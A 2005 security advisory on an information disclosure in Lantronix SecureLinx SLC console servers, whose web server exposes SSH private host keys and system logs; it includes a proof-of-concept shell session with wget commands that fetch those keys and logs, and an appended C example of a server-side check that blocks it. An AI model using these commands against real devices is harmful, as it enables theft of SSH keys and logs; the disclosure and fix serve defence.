
| Subject: | [UNIX] Lantronix SecureLinx Console Server Information Disclosure |
|---|---|
| Date: | 25 Jul 2005 19:15:53 +0200 |

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Lantronix SecureLinx Console Server Information Disclosure
------------------------------------------------------------------------

SUMMARY

"The <http://www.lantronix.com/data-center-management/console-servers/securelinx-slc.html> SecureLinx SLC console manager provides secure, remote access to servers and IT infrastructure equipment, whether it's located down the hall or across the globe."

A vulnerability discovered in Lantronix's SecureLinx allows retrieval of the server's ssh-private keys and system logfiles.

DETAILS

Vulnerable Systems:
 * All models of SLC series (SLC8, 16, 32, 48)
 * SLC32, Software version: 2.0, 3.0

Lantronix console servers come with a mini_httpd that doesn't validate the local host's UNIX ACLs. This allows remote attackers to retrieve the files located under the /etc/ssh directory. This renders the ssh-encryption close to useless.

In addition attackers can read the log files located under /cifsshare/logs (Though the directory is named /cifsshare/logs/ it contains system logs, potentially also snifferlogs from serial console sessions).

Note that console servers provide an administrative console access to devices hooked up on their serial lines (up to 48).

Vendor Status:
Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0 (current)

Patch Availability:
Bugfix pending. Vendor is working on 3.1, to be released in August.

Proof of concept:

    myprompt:~ # ssh slc
    The authenticity of host 'slc (192.168.50.205)' can't be established.
    RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known hosts.
    Welcome to the SLC
    login: root
    Password:
    Connection to slc closed.
    myprompt:~ # tail -1 .ssh/known_hosts
    slc,192.168.50.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09
    9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs
    7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=
    myprompt:~ # wget -q -O - https://slc/etc
    <HTML><HEAD><TITLE>Index of etc/</TITLE></HEAD>
    <BODY BGCOLOR="#99cc99"><H4>Index of etc/</H4>
    <PRE>
    -rw------- 1 root 672 Jan 1 1970 ssh_host_dsa_key
    -rw-r--r-- 1 root 601 Jan 1 1970 ssh_host_dsa_key.pub
    -rw------- 1 root 526 Jan 1 1970 ssh_host_key
    -rw-r--r-- 1 root 330 Jan 1 1970 ssh_host_key.pub
    -rw------- 1 root 883 Jan 1 1970 ssh_host_rsa_key
    -rw-r--r-- 1 root 221 Jan 1 1970 ssh_host_rsa_key.pub
    </PRE>
    <HR>
    <ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.15c 02may2001</A></ADDRESS>
    </BODY></HTML>
    myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub
    ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoX
    E1e8g099yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9Af
    iNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f
    Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none)
    myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY
    -----BEGIN RSA PRIVATE KEY-----
    -----END RSA PRIVATE KEY-----
    myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY
    -----BEGIN DSA PRIVATE KEY-----
    -----END DSA PRIVATE KEY-----
    myprompt:~ # wget -O - -q https://slc/cifsshare/logs/
    <HTML><HEAD><TITLE>Index of cifsshare/logs/</TITLE></HEAD>
    <BODY BGCOLOR="#99cc99"><H4>Index of cifsshare/logs/</H4>
    <PRE>
    lrwxrwxrwx Oct 21 2004 authentication <A HREF="-> ./../../var/log/secure">-> ../../../var/log/secure</A>
    lrwxrwxrwx Oct 21 2004 devports <A HREF="-> ./../../var/log/devports">-> ../../../var/log/devports</A>
    lrwxrwxrwx Oct 21 2004 diag <A HREF="-> ../../../var/log/diag">-> ./../../var/log/diag</A>
    lrwxrwxrwx Oct 21 2004 general <A HREF="-> ./../../var/log/general">-> ../../../var/log/general</A>
    lrwxrwxrwx Oct 21 2004 network <A HREF="-> ./../../var/log/network">-> ../../../var/log/network</A>
    lrwxrwxrwx Oct 21 2004 services <A HREF="-> ./../../var/log/services">-> ../../../var/log/services</A>
    lrwxrwxrwx Oct 21 2004 sw <A HREF="-> ../../../var/log/sw">-> ./../../var/log/sw</A>
    </PRE>
    <HR>
    <ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.15c 02may2001</A></ADDRESS>
    </BODY></HTML>
    myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk '{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q https://slc/cifsshare/logs/$i; done
    ..
    ..

ADDITIONAL INFORMATION

The information has been provided by Dr. Dirk Wetter.
The original article can be found at: http://drwetter.org/
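
The flaw described under DETAILS, seen from the server side, as an added example that is not mini_httpd's or Lantronix's code: a pre-serve check that resolves the requested path, keeps it inside the document root, and refuses files that are not world-readable, which covers both the 0600 host keys and the symlinked logs in the listings above. The function names, the `www`/`var` layout and the temp directory are assumptions constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Return 1 if docroot/rel may be served, 0 if not. A daemon running as root
 * passes every kernel permission check, so it has to apply the policy itself. */
int may_serve(const char *docroot, const char *rel) {
    char root[PATH_MAX], full[PATH_MAX], real[PATH_MAX];
    struct stat st;
    if (!realpath(docroot, root)) return 0;
    if ((size_t)snprintf(full, sizeof full, "%s/%s", root, rel) >= sizeof full)
        return 0;
    if (!realpath(full, real)) return 0;        /* resolves symlinks and ".." */
    size_t n = strlen(root);                    /* then test containment */
    if (n > 1 && (strncmp(real, root, n) != 0 ||
                  (real[n] != '/' && real[n] != '\0')))
        return 0;
    /* Regular files only, and only with the "other" read bit: 0600 fails. */
    return stat(real, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & S_IROTH);
}

static void put(const char *path, mode_t mode) { /* empty file, exact mode */
    FILE *f = fopen(path, "w");
    if (f) fclose(f);
    chmod(path, mode);                          /* independent of the umask */
}

/* Constructed tree under a fresh temp dir (becomes the cwd): www/ holds a 0600
 * key and a 0644 .pub; www/logs is a symlink to ../var, outside the docroot. */
int build_demo(void) {
    char base[] = "/tmp/slcdemoXXXXXX";
    if (!mkdtemp(base) || chdir(base) || mkdir("www", 0755) ||
        mkdir("var", 0755) || symlink("../var", "www/logs")) return -1;
    put("www/ssh_host_rsa_key", 0600);
    put("www/ssh_host_rsa_key.pub", 0644);
    put("var/secure", 0644);
    return 0;
}

int main(void) {
    const char *req[] = { "ssh_host_rsa_key", "ssh_host_rsa_key.pub", "logs/secure" };
    if (build_demo() != 0) return 1;
    for (int i = 0; i < 3; i++)
        printf("%-21s %s\n", req[i], may_serve("www", req[i]) ? "serve" : "deny");
}
```

The containment test runs on the resolved path, so a symlink inside the document root that points outside it is refused even though the requested name contains no "..".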